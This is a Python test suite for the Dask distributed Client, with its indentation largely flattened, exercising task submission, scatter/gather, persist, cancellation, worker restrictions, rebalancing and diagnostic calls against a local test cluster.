@gen_cluster(client=True)
async def test_upload_file_exception(c, s, a, b):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
await c.upload_file(fn)
def test_upload_file_exception_sync(c):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
c.upload_file(fn)
@gen_cluster(client=True, nthreads=[])
async def test_upload_file_new_worker(c, s):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
await c.upload_file(fn)
async with Worker(s.address):
x = await c.submit(g)
assert x == 123
@pytest.mark.skip
@gen_cluster()
async def test_multiple_clients(s, a, b):
a = await Client(s.address, asynchronous=True)
b = await Client(s.address, asynchronous=True)
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.client is a
assert y.client is b
xx = await x
yy = await y
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.client is a
zz = await z
assert zz == 5
await a.close()
await b.close()
@gen_cluster(client=True)
async def test_async_compute(c, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = c.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = await c.gather([yy, zz])
assert result == [2, 0]
assert isinstance(c.compute(y), Future)
assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
async def test_async_compute_with_scatter(c, s, a, b):
d = await c.scatter({("x", 1): 1, ("y", 1): 2})
x, y = d[("x", 1)], d[("y", 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = c.compute(z)
[result] = await c.gather([zz])
assert result == 2 + 3
def test_sync_compute(c):
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = c.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
async def test_remote_scatter_gather(c, s, a, b):
x, y, z = await c.scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(timeout=1000, client=True)
async def test_remote_submit_on_Future(c, s, a, b):
x = c.submit(lambda x: x + 1, 1)
y = c.submit(lambda x: x + 1, x)
result = await y
assert result == 3
def test_start_is_idempotent(c):
c.start()
c.start()
c.start()
x = c.submit(inc, 1)
assert x.result() == 2
@gen_cluster(client=True)
async def test_client_with_scheduler(c, s, a, b):
assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y)
result = await x
assert result == 1 + 1
result = await z
assert result == 1 + 1 + 1 + 2
A, B, C = await c.scatter([1, 2, 3])
AA, BB, xx = await c.gather([A, B, x])
assert (AA, BB, xx) == (1, 2, 2)
result = await c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
assert result == 12
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_allow_restrictions(c, s, a, b):
aws = s.workers[a.address]
    bws = s.workers[b.address]
x = c.submit(inc, 1, workers=a.ip)
await x
assert s.tasks[x.key].who_has == {aws}
assert not s.loose_restrictions
x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
await x
assert s.tasks[x.key].who_has == {aws}
assert x.key in s.loose_restrictions
L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has == {aws} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
await x
assert s.tasks[x.key].who_has
assert x.key in s.loose_restrictions
L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
c.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
c.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
with pytest.raises(TypeError):
c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
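# Note on the restriction semantics exercised above: ``workers=`` pins tasks to
# specific machines, while ``allow_other_workers=True`` downgrades that pin to
# a preference (a "loose restriction"), so work can still run elsewhere -- even
# when the requested host (127.0.0.3) does not exist.  Passing
# ``allow_other_workers`` without ``workers``, or with a non-boolean value, is
# rejected up front.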
@pytest.mark.skipif("True", reason="because")
def test_bad_address():
try:
Client("123.123.123.123:1234", timeout=0.1)
except (IOError, TimeoutError) as e:
assert "connect" in str(e).lower()
try:
Client("127.0.0.1:1234", timeout=0.1)
except (IOError, TimeoutError) as e:
assert "connect" in str(e).lower()
def test_informative_error_on_cluster_type():
with pytest.raises(TypeError) as exc_info:
Client(LocalCluster)
assert "Scheduler address must be a string or a Cluster instance" in str(
exc_info.value
)
@gen_cluster(client=True)
async def test_long_error(c, s, a, b):
def bad(x):
raise ValueError("a" * 100000)
x = c.submit(bad, 10)
try:
await x
except ValueError as e:
assert len(str(e)) < 100000
tb = await x.traceback()
assert all(
len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
@gen_cluster(client=True)
async def test_map_on_futures_with_kwargs(c, s, a, b):
def f(x, y=10):
return x + y
futures = c.map(inc, range(10))
futures2 = c.map(f, futures, y=20)
results = await c.gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = c.submit(inc, 100)
future2 = c.submit(f, future, y=200)
result = await future2
assert result == 100 + 1 + 200
class BadlySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
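# FatallySerializedObject simulates data that kills whichever process tries to
# unpickle it: ``__setstate__`` calls ``sys.exit(0)``, so the receiving worker
# terminates instead of raising an exception the scheduler could report back.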
@gen_cluster(client=True)
async def test_badly_serialized_input(c, s, a, b):
o = BadlySerializedObject()
future = c.submit(inc, o)
futures = c.map(inc, range(10))
L = await c.gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == "error"
with pytest.raises(Exception) as info:
await future
assert "hello!" in str(info.value)
@pytest.mark.skipif("True", reason="")
async def test_badly_serialized_input_stderr(capsys, c):
o = BadlySerializedObject()
future = c.submit(inc, o)
start = time()
while True:
sleep(0.01)
out, err = capsys.readouterr()
if "hello!" in err:
break
assert time() - start < 20
assert future.status == "error"
def test_repr(loop):
funcs = [str, repr, lambda x: x._repr_html_()]
with cluster(nworkers=3, worker_kwargs={"memory_limit": "2 GB"}) as (s, [a, b, c]):
with Client(s["address"], loop=loop) as c:
for func in funcs:
text = func(c)
assert c.scheduler.address in text
assert "threads=3" in text or "Cores: </b>3" in text
assert "6.00 GB" in text or "5.59 GiB" in text
if "<table" not in text:
assert len(text) < 80
for func in funcs:
text = func(c)
assert "not connected" in text
@gen_cluster(client=True)
async def test_repr_async(c, s, a, b):
c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
async def test_repr_no_memory_limit(c, s, a, b):
c._repr_html_()
@gen_test()
async def test_repr_localcluster():
cluster = await LocalCluster(
processes=False, dashboard_address=None, asynchronous=True
)
client = await Client(cluster, asynchronous=True)
try:
text = client._repr_html_()
assert cluster.scheduler.address in text
assert is_valid_xml(client._repr_html_())
finally:
await client.close()
await cluster.close()
@gen_cluster(client=True)
async def test_forget_simple(c, s, a, b):
x = c.submit(inc, 1, retries=2)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key not in s.tasks
assert z.key not in s.tasks
assert not s.tasks[y.key].dependents
s.client_releases_keys(keys=[y.key], client=c.id)
assert not s.tasks
@gen_cluster(client=True)
async def test_forget_complex(e, s, A, B):
a, b, c, d = await e.scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
await wait([a, b, c, d, ab, ac, cd, acab])
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
assert b.key not in s.tasks
start = time()
while b.key in A.data or b.key in B.data:
await asyncio.sleep(0.01)
assert time() < start + 10
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
async def test_forget_in_flight(e, s, A, B):
delayed2 = partial(delayed, pure=True)
a, b, c, d = [delayed2(slowinc)(i) for i in range(4)]
ab = delayed2(slowadd)(a, b, dask_key_name="ab")
cd = delayed2(slowadd)(c, d, dask_key_name="cd")
ac = delayed2(slowadd)(a, c, dask_key_name="ac")
acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
x, y = e.compute([ac, acab])
s.validate_state()
for i in range(5):
await asyncio.sleep(0.01)
s.validate_state()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate_state()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
@gen_cluster(client=True)
async def test_forget_errors(c, s, a, b):
x = c.submit(div, 1, 0)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=c.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(c):
s = str(c)
r = repr(c)
assert c.scheduler.address in s
assert c.scheduler.address in r
assert str(2) in s # nworkers
assert "cores" in s or "threads" in s
@gen_cluster(client=True)
async def test_waiting_data(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
@gen_cluster()
async def test_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
assert set(s.client_comms) == {c.id, f.id}
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
assert s.wants_what == {
c.id: {x.key, y.key},
f.id: {y.key},
"fire-and-forget": set(),
}
assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
await c.close()
start = time()
while c.id in s.wants_what:
await asyncio.sleep(0.01)
assert time() < start + 5
assert c.id not in s.wants_what
assert c.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
await f.close()
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 2, s.tasks
def long_running_client_connection(address):
with pristine_loop():
c = Client(address)
x = c.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
@gen_cluster()
async def test_cleanup_after_broken_client_connection(s, a, b):
proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
proc.daemon = True
proc.start()
start = time()
while not s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
proc.terminate()
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
@gen_cluster()
async def test_multi_garbage_collection(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
x.__del__()
start = time()
while x.key in a.data or x.key in b.data:
await asyncio.sleep(0.01)
assert time() < start + 5
assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id, f.id}}
y.__del__()
start = time()
while x.key in s.wants_what[f.id]:
await asyncio.sleep(0.01)
assert time() < start + 5
await asyncio.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id}}
y2.__del__()
start = time()
while y.key in a.data or y.key in b.data:
await asyncio.sleep(0.01)
assert time() < start + 5
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
await c.close()
await f.close()
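# Rough sketch of the scheduler-side bookkeeping stepped through above:
# ``wants_what`` maps client id -> keys that client still references, and
# ``who_wants`` is its inverse.  Deleting a Future only drops that client's
# interest; the data itself is released once no client wants the key any more.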
@gen_cluster(client=True)
async def test__broadcast(c, s, a, b):
x, y = await c.scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test__broadcast_integer(c, s, *workers):
x, y = await c.scatter([1, 2], broadcast=2)
assert len(s.tasks[x.key].who_has) == 2
assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
async def test__broadcast_dict(c, s, a, b):
d = await c.scatter({"x": 1}, broadcast=True)
assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
x, y = c.scatter([1, 2], broadcast=True)
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key},
b["address"]: {x.key, y.key},
}
[z] = c.scatter([3], broadcast=True, workers=[a["address"]])
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key, z.key},
b["address"]: {x.key, y.key},
}
@gen_cluster(client=True)
async def test_proxy(c, s, a, b):
msg = await c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
async def test__cancel(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, x)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
await c.cancel([x])
assert x.cancelled()
assert "cancel" in str(x)
s.validate_state()
start = time()
while not y.cancelled():
await asyncio.sleep(0.01)
assert time() < start + 5
assert not s.tasks
s.validate_state()
@gen_cluster(client=True)
async def test_cancel_tuple_key(c, s, a, b):
x = c.submit(inc, 1, key=("x", 0, 1))
await x
await c.cancel(x)
with pytest.raises(CancelledError):
await x
@gen_cluster()
async def test_cancel_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
await c.cancel([x])
assert x.cancelled()
assert not y.cancelled()
start = time()
while y.key not in s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
out = await y
assert out == 2
with pytest.raises(CancelledError):
await x
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_cancel_collection(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await c.cancel(x)
await c.cancel([x])
assert all(f.cancelled() for f in L)
start = time()
while s.tasks:
assert time() < start + 1
await asyncio.sleep(0.01)
def test_cancel(c):
x = c.submit(slowinc, 1, key="x")
y = c.submit(slowinc, x, key="y")
z = c.submit(slowinc, y, key="z")
c.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 5
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(client=True)
async def test_future_type(c, s, a, b):
x = c.submit(inc, 1)
await wait([x])
assert x.type == int
assert "int" in str(x)
@gen_cluster(client=True)
async def test_traceback_clean(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await x
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert "scheduler" not in tb.tb_frame.f_code.co_filename
assert "worker" not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(client=True)
async def test_map_different_lengths(c, s, a, b):
assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert dask.base.get_scheduler() == c.get
out, err = capsys.readouterr()
assert len(out.strip().split("\n")) == 1
assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
async def test_async_persist(c, s, a, b):
from dask.delayed import Delayed, delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = c.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y.__dask_keys__() == yy.__dask_keys__()
assert w.__dask_keys__() == ww.__dask_keys__()
while y.key not in s.tasks and w.key not in s.tasks:
await asyncio.sleep(0.01)
assert s.who_wants[y.key] == {c.id}
assert s.who_wants[w.key] == {c.id}
yyf, wwf = c.compute([yy, ww])
yyy, www = await c.gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(c.persist(y), Delayed)
assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
async def test__persist(c, s, a, b):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
g, h = c.compute([y, yy])
gg, hh = await c.gather([g, h])
assert (gg == hh).all()
def test_persist(c):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
zz = yy.compute()
z = y.compute()
assert (zz == z).all()
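# Sketch of the persist/compute distinction the two tests above exercise,
# assuming a synchronous client and an importable dask.array; not part of the
# original suite.
def _example_persist_vs_compute(client):
    import dask.array as da

    x = 2 * (da.ones((10, 10), chunks=(5, 10)) + 1)
    persisted = client.persist(x)  # same chunk structure, chunks backed by Futures
    computed = client.compute(x)   # a single Future resolving to a concrete array
    return persisted, computed.result()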
@gen_cluster(timeout=60, client=True)
async def test_long_traceback(c, s, a, b):
from distributed.protocol.pickle import dumps
def deep(n):
if n == 0:
1 / 0
else:
return deep(n - 1)
x = c.submit(deep, 200)
await wait([x])
assert len(dumps(c.futures[x.key].traceback)) < 10000
assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
async def test_wait_on_collections(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
async def test_futures_of_get(c, s, a, b):
x, y, z = c.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
assert set(futures_of({"x": x, "y": [y]})) == {x, y}
b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
assert set(futures_of(b)) == {x, y, z}
sg = SubgraphCallable(
{"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
"out",
("in",),
)
assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
da = pytest.importorskip("dask.array")
assert futures_of([da.Array]) == []
@gen_cluster(client=True)
async def test_futures_of_cancelled_raises(c, s, a, b):
x = c.submit(inc, 1)
await c.cancel([x])
with pytest.raises(CancelledError):
await x
with pytest.raises(CancelledError):
await c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
with pytest.raises(CancelledError):
c.submit(inc, x)
with pytest.raises(CancelledError):
c.submit(add, 1, y=x)
with pytest.raises(CancelledError):
c.map(add, [1], y=x)
assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_dont_delete_recomputed_results(c, s, w):
x = c.submit(inc, 1) # compute first time
await wait([x])
x.__del__() # trigger garbage collection
await asyncio.sleep(0)
xx = c.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
await asyncio.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
await asyncio.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
async def test_fatally_serialized_input(c, s):
o = FatallySerializedObject()
future = c.submit(inc, o)
while not s.tasks:
await asyncio.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
async def test_balance_tasks_by_stacks(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
y = c.submit(inc, 2)
await wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
async def test_run(c, s, a, b):
results = await c.run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = await c.run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(inc, 1, workers=[])
assert results == {}
@gen_cluster(client=True)
async def test_run_handles_picklable_data(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
def func():
return {}, set(), [], (), 1, "hello", b"100"
results = await c.run_on_scheduler(func)
assert results == func()
results = await c.run(func)
assert results == {w.address: func() for w in [a, b]}
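# Client.run() executes a function directly on each worker, outside the task
# graph, and returns ``{worker_address: result}``; run_on_scheduler() does the
# same on the scheduler process.  A common diagnostic sketch (not part of the
# original suite), assuming a synchronous, connected ``client``:
def _example_run_diagnostics(client):
    import os

    worker_pids = client.run(os.getpid)            # one pid per worker
    scheduler_pid = client.run_on_scheduler(os.getpid)
    return worker_pids, scheduler_pid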
def test_run_sync(c, s, a, b):
def func(x, y=10):
return x + y
result = c.run(func, 1, y=2)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(func, 1, y=2, workers=[a["address"]])
assert result == {a["address"]: 3}
@gen_cluster(client=True)
async def test_run_coroutine(c, s, a, b):
results = await c.run(geninc, 1, delay=0.05)
assert results == {a.address: 2, b.address: 2}
results = await c.run(geninc, 1, delay=0.05, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(geninc, 1, workers=[])
assert results == {}
with pytest.raises(RuntimeError, match="hello"):
await c.run(throws, 1)
results = await c.run(asyncinc, 2, delay=0.01)
assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
result = c.run(geninc, 2, delay=0.01)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(geninc, 2, workers=[a["address"]])
assert result == {a["address"]: 3}
t1 = time()
result = c.run(geninc, 2, delay=10, wait=False)
t2 = time()
assert result is None
assert t2 - t1 <= 1.0
def test_run_exception(c):
def raise_exception(exc_type, exc_msg):
raise exc_type(exc_msg)
for exc_type in [ValueError, RuntimeError]:
with pytest.raises(exc_type, match="informative message"):
c.run(raise_exception, exc_type, "informative message")
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = a["address"]
b_addr = b["address"]
with Client(s["address"], loop=loop) as c:
d = c.nthreads()
assert d == {a_addr: 1, b_addr: 1}
d = c.nthreads([a_addr])
assert d == {a_addr: 1}
d = c.nthreads(a_addr)
assert d == {a_addr: 1}
d = c.nthreads(a["address"])
assert d == {a_addr: 1}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(inc, 3)
wait([x, y, z])
d = c.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = c.who_has([x, y])
assert set(d) == {x.key, y.key}
d = c.who_has(x)
assert set(d) == {x.key}
d = c.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = c.has_what([a_addr])
assert set(d) == {a_addr}
d = c.has_what(a_addr)
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
wait(incs + doubles)
assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
async def test_diagnostic_nbytes(c, s, a, b):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
await wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_test()
async def test_worker_aliases():
s = await Scheduler(validate=True, port=0)
a = Worker(s.address, name="alice")
b = Worker(s.address, name="bob")
w = Worker(s.address, name=3)
await asyncio.gather(a, b, w)
c = await Client(s.address, asynchronous=True)
L = c.map(inc, range(10), workers="alice")
future = await c.scatter(123, workers=3)
await wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
assert dict(w.data) == {future.key: 123}
for i, alias in enumerate([3, [3], "alice"]):
result = await c.submit(lambda x: x + 1, i, workers=alias)
assert result == i + 1
await c.close()
await asyncio.gather(a.close(), b.close(), w.close())
await s.close()
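# Workers started with ``name=...`` can be addressed by that name (or a list of
# names) anywhere an address is accepted -- ``workers="alice"`` in map/submit
# and ``workers=3`` in scatter above both resolve to the matching worker.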
def test_persist_get_sync(c):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
async def test_persist_get(c, s, a, b):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
await asyncio.sleep(0.5)
result = await c.gather(c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False))
assert result[0] == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
psutil = pytest.importorskip("psutil")
with cluster() as (s, [a, b]):
proc = psutil.Process()
with Client(s["address"], loop=loop) as c: # first client to start loop
before = proc.num_fds() # measure
for i in range(4):
with Client(s["address"], loop=loop): # start more clients
pass
start = time()
while proc.num_fds() > before:
sleep(0.01)
assert time() < start + 4
@gen_cluster()
async def test_startup_close_startup(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c = await Client(s.address, asynchronous=True)
await c.close()
def test_startup_close_startup_sync(loop):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
sleep(0.1)
with Client(s["address"]) as c:
pass
with Client(s["address"]) as c:
pass
sleep(0.1)
with Client(s["address"]) as c:
pass
@gen_cluster(client=True)
async def test_badly_serialized_exceptions(c, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException("hello world")
x = c.submit(f)
try:
result = await x
except Exception as e:
assert "hello world" in str(e)
else:
assert False
@gen_cluster(client=True)
async def test_rebalance(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[b.address]
x, y = await c.scatter([1, 2], workers=[a.address])
assert len(a.data) == 2
assert len(b.data) == 0
s.validate_state()
await c.rebalance()
s.validate_state()
assert len(b.data) == 1
assert {ts.key for ts in bws.has_what} == set(b.data)
assert bws in s.tasks[x.key].who_has or bws in s.tasks[y.key].who_has
assert len(a.data) == 1
assert {ts.key for ts in aws.has_what} == set(a.data)
assert aws not in s.tasks[x.key].who_has or aws not in s.tasks[y.key].who_has
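# rebalance() only moves keys that already sit in worker memory; it never
# recomputes tasks.  Starting from two keys on one worker and none on the
# other, an even split leaves exactly one key on each, as asserted above.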
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 4, client=True)
async def test_rebalance_workers(e, s, a, b, c, d):
w, x, y, z = await e.scatter([1, 2, 3, 4], workers=[a.address])
assert len(a.data) == 4
assert len(b.data) == 0
assert len(c.data) == 0
assert len(d.data) == 0
await e.rebalance([x, y], workers=[a.address, c.address])
assert len(a.data) == 3
assert len(b.data) == 0
assert len(c.data) == 1
assert len(d.data) == 0
assert c.data == {x.key: 2} or c.data == {y.key: 3}
await e.rebalance()
assert len(a.data) == 1
